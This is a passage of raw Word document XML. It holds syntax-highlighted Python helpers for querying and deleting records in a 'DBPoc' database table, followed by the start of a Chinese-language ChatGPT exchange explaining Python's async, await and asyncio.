          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(poc)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>commit</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>e:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(e)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>is_eid_exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eid</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># exist True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        # not exist False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(DBPoc).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(DBPoc.eid == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>is None</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return False</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        else</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>return True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>view_all_poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'DBPoc:'</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all_poc = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(DBPoc)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">poc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>all_poc:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(poc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDDE491" w14:textId="77777777" w:rsidR="000C1018" w:rsidRPr="00327971" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB2ABDB" w14:textId="77777777" w:rsidR="00A36DC7" w:rsidRDefault="00A36DC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B0704F" w14:textId="77777777" w:rsidR="00A36DC7" w:rsidRDefault="00A36DC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2953F30F" w14:textId="77777777" w:rsidR="00A36DC7" w:rsidRDefault="00A36DC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66925473" w14:textId="77777777" w:rsidR="00A36DC7" w:rsidRDefault="00A36DC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C9051D3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Model: GPT-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279FE9FD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE05CB0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我不懂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库的使用，告诉我他们的用法。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>告诉我他们和多线程的区别，和使用场景的区别。给我多个案例让我理解。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0650943F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53F33A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA6D6B5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一个库，用于编写单线程并发代码。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是基于协程的，它使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async/await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法。它的主要组成部分包括事件循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Event Loop)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、协程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Coroutine)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Task)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、未来对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Future)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、和其他并发并行运行任务的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A87A10A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7039DAD1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C6A20" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03D0448A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先来看一下如何使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E21FCC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68EAC1C1" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    async</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义一个协程函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1117F17E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E982339" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8C213E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def hello():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E411B4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print("Hello, asyncio!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F87F97C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7AF4BF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以用在协程函数内部，表达等待另一个操作完成的意思。通常情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后面跟的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作、耗时操作或者其他协程函数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0C1009" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
